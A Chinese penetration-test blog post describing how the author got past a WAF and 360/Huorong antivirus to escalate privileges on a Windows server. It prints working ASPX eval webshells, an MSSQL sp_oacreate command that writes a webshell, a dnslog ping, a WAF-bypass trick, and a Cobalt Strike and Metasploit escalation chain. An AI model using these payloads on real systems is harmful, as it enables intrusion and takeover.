<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    繞過WAF和多個防護軟件提權案例

    一顆小胡椒2022-07-14 08:34:57

    0x01 前言

    這篇文章記錄的是朋友在某次項目測試中遇到的一個因存在WAF和多個防護軟件而無法提權的問題,這次繞防護提權的過程中也是踩了不少的坑,記錄分享下。

    0x02 測試過程

    朋友發過來的是一個asmx的哥斯拉Webshell,說是存在wdf+360+火絨等安全防護,wdf可能已被360或火絨給接管了,所以這里我們主要繞的是360、火絨。

    連上Webshell后發現執行不了任何命令,連常規的set、ver、whoami等命令都不行,EXE就更不用說了。

    執行時會卡一段時間,沒有回顯,也不顯示:拒絕訪問,說明不是360和火絨攔的。

    而且哥斯拉的EfsPotato、BadPotota、SweetPotato、PortScan和網絡詳情等多個功能模塊都用不了。

    執行時都會卡一段時間,然后直接就結束掉了,360和火絨默認不會攔這些,也不知道是啥防護攔的。

    Web根目錄下找到一個web.config,里邊存儲著MSSQL數據庫的連接信息,用的是SA用戶,這時可以嘗試xp_cmdshell、sp_oacreate等方式去執行命令,不出意外直接就能得到SYSTEM。

    首先通過sp_oacreate測試寫入一個Webshell,發現文件已經被成功寫入到指定路徑中,這就說明這種方式是可以利用的,但發現在Webshell下沒有權限去刪除剛寫入的這個文件,不知道什么鬼。

    declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\ProgramData\shell1.aspx',1;EXEC sp_oamethod  @f,'WriteLine',null,'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a%2Bb));%>'
    

    現實并沒有我們想象的那么順利,因為xp_cmdshell默認是調用system32下的cmd,360會對其進行攔截。

    而使用sp_oacreate執行ping、whoami命令時就有看到高權限運行的進程,所以說應該是可以提的。

    declare @shell int;exec sp_oacreate 'wscript.shell',@shell output;exec sp_oamethod @shell,'run',null,'C:\Windows\System32\ping ******.dnslog.cn'
    

    通過使用ping dnslog和將命令執行結果寫入文件等方式發現命令都沒有執行成功,也嘗試了sqlps、msbuild等白名單獲取MSF會話,也都失敗了,命令中有無空格結果都一樣,不知道什么鬼。

    sqlps、msbuild執行后也有進程,但如果直接去執行指定的木馬程序就沒有進程,也就是說也沒有執行成功。

    C:\ProgramData\msf.exeC:\Windows\System32\ping ******.dnslog.cnC:\Windows\System32\whoami > C:\ProgramData\1.txtC:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe shellcode.xml
    

    以上只是簡單記錄了下測試過程中遇到的問題,目前只能執行部分cobaltstrike內置命令,還不能執行系統命令和上線,接下來我們將在本地模擬這個實戰場景來演示如何上線和提權。

    0x03 提權過程

    首先我們用cobaltstrike生成一個C的shellcode,將shellcode中的\x"以及多余字符都刪除掉,只需留下hex shellcode即可,然后利用哥斯拉工具的shellcode加載模塊上線。

    注:不知為啥在這個場景中MSF的shellcode就不行,也嘗試了用哥斯拉的Meterpeter也不行,都上線不了。

    但還是執行不了命令/程序,execute-assembly內存加載也不行,這里不太確定是被什么攔的,現在只能執行部分cobaltstrike內置命令,如:getuid、upload、ps等。

    雖然shell命令不能執行,但我們還可以去試下run、execute,結果發現可以使用execute命令去執行免殺的MSF木馬上線。

    后邊才發現原來可以直接通過cobaltstrike的spawn派生會話,這里有個坑,見文末。

    通過cobaltstrike的spawn進行派生會話時,MSF監聽使用的Payload必須與cobaltstrike監聽的一致,HTTP或HTTPS,不能使用TCP,否則也可能獲取不了會話。

    這時就可以直接利用ms16_075_reflection_juicy模塊來進行提權了,下圖中可以看到已經利用成功,但是并沒有獲取到一個新的高權限會話,不過可以直接執行getsystem進行提權。

    注:我們在本地復現測試時發現使用低版本MSF的ms16_075_reflection_juicy模塊怎樣都提權不了,最后沒辦法,找朋友借了他的VPS測試了下,結果一次性就成功了,所以說在實戰中還是得多嘗試!!!

    0x04 注意事項

    如果提權過程中需要遷移進程,但是沒有可用的遷移進程,這時可以嘗試用execute -Hc -f命令去執行vbc.exe和SQLPS.exe等程序得到一個可遷移進程。?

    坑點一:

    目標好像存在什么WAF,上傳Webshell時并沒有查殺,但冰蝎馬和其他一些大馬、命令執行馬在訪問時一直轉圈圈,沒能解析成功,應該是被攔了,只能用哥斯拉asmx馬和中國菜刀aspx馬。

    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%><%@ Page Language="Jscript"%><% eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("ZXZhbChSZXF1ZXN0Lkl0ZW1bImFudCJdLCJ1bnNhZmUiKTs=")),"unsafe"); %>
    

    為什么普通aspx馬都能過呢?經過測試后發現這個WAF好像是根據Webshell聲明的文件頭來進行攔截的,只要帶有Page Language="C#"就會被攔,不知道這是啥WAF,居然沒有攔截特征。

    大馬/冰蝎/哥斯拉aspx:<%@ Page Language="C#" %>中國菜刀aspx:<%@ Page Language="Jscript" %>哥斯拉asmx:<%@ WebService Language="C#" Class="WebService1" %>
    

    坑點二:

    當時朋友告訴我他有試過cobaltstrike派生會話到MSF去提權,但是派生不了,他以為是被防護攔截了,所以我也沒有再去測試這個,過于信任他了。

    最后發現是他在cobaltstrike設置的監聽端口有問題,當時監聽的是21端口,而他的VPS只允許使用60000以上的端口來監聽,所以MSF獲取不到會話。

    坑點三:

    寫這篇文章時發現這臺主機已被重啟過,這時哥斯拉虛擬終端、cobaltstrike、MSSQL的sp_oacreate都可以執行命令了,但像powershell、net user等高危命令最好還是不要去執行,360仍會攔截。

    最后也沒搞明白是什么東西導致出現文中的各種問題,重啟以后大多數都沒有再被攔了,也不知道是不是重啟以后才能派生的會話,如果在防護生效不能派生會話時我們又該如何進行提權呢......?

    webshell火絨
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    正常的doc是能夠返回路徑的,訪問url直接下載文件。為了驗證目標機器搭載了tomcat服務,我訪問了對應web,發現確實存在,喜出望外,在webapp下寫入了jsp木馬,成功拿下管理員權限,為了進一步dumphash,開3389,用unicode加密的powershell繞過了火絨成功上線。
    HW藍隊初級面試總結
    2022-10-12 07:00:02
    一、sql注入原理、分類、繞過原理:產生sql注入漏洞主要因為沒有對接受到的參數進行過濾、驗證和處理直接拼接到了sql語句中,然后直接執行該sql語句,這樣就會導致惡意用戶傳入一些精心構造的sql代碼,與后臺sql語句拼接后形成完整的sql語句執行,達到攻擊者的目的。
    突破安全策略上線CS
    2021-10-29 08:09:17
    0x01 環境簡述&說明web打點getshell,webshell是冰蝎,權限為.net,權限很低,服務器為server 2016,目標不出網!0x02 為什么要上線cswebshell權限太低,限制性大,需要上線cs提權,因為cs是采用反射dll來加載pe程序,從而在執行一些敏感操作的時候能起到一定的bypass作用,例如mimikatz抓密碼等操作。
    應急響應之入侵排查
    2022-07-19 17:10:59
    常見的應急響應事件分類: Web入侵:網頁掛馬、主頁篡改、Webshell 系統入侵:病毒木馬、勒索軟件、遠控后門 網絡攻擊:DDOS攻擊、DNS劫持、ARP欺騙
    連上Webshell后發現執行不了任何命令,連常規的set、ver、whoami等命令都不行,EXE就更不用說了。執行時會卡一段時間,沒有回顯,也不顯示:拒絕訪問,說明不是360和火絨攔的。
    Windows應急響應
    2021-11-15 12:48:10
    一旦中了勒索病毒,文件會被鎖死,沒有辦法正常訪問了,這時候,會給你帶來極大的困惱。為了防范這樣的事情出現,我們電腦上要先做好一些措施:1、安裝殺毒軟件,保持監控開啟,定期全盤掃描。把異常文件拖出來進行檢測,查看檢測結果。
    通過 NGSOC 平臺搜索語法篩選5月21-26日訪問該應用系統的互聯網地址,發現從25日凌晨開始有19個異常高頻的訪問記錄,大多數為來自中國四川。文件分析結合惡意文件創建時間及 NGSOC流 量記錄信息,判斷攻擊者開展攻擊時間為2021年5月25日凌晨0時至2021年5月26日上午10點30分。
    一、前言 二、Windows入侵排查 檢查系統賬號安全 檢查異常端口、進程 檢查啟動項、計劃任務、服務 檢查系統相關信息 自動化查殺 日志分析 三、Linux入侵排查 賬號安全 歷史命令 檢查異常端口 檢查異常進程 檢查開機啟動項 檢查定時任務 檢查服務 檢查異常文件 檢查系統日志
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类